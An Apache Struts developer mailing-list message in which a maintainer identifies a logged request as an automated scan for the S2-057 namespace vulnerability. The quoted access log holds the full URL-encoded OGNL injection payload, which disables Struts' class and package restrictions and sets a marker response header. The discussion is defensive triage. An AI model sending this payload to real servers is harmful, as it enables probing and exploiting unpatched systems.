struts-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Lukasz Lenart <lukaszlen...@apache.org>
Subject Re: Not seen this attempt before?
Date Sun, 20 Jan 2019 14:33:37 GMT
niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3269@gmail.com> napisał(a):
>
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
> 200 2023 "-" "Auto Spider 1.0"

I would say a robot is scanning Internet to find vulnerable sites and
looks like it addresses the latest vulnerability with namespace
evaluation
https://cwiki.apache.org/confluence/display/WW/S2-057


Regards
-- 
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org


Mime
View raw message